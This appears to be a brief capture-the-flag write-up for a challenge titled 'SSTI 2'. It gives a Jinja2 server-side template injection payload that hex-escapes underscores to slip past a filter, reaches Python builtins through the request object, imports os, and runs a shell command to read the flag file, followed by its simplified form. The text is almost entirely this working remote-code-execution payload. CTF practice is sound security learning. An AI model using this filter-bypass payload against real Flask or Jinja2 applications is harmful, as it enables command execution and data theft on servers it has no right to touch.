SSTI 2¶

VERY Helpful blog

This payload works:

{{ request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('cat /challenge/flag')|attr('read')() }}

Simplifies to:

{{ request.application.__globals__.__builtins__.__import__('os').popen('cat /challenge/flag').read() }}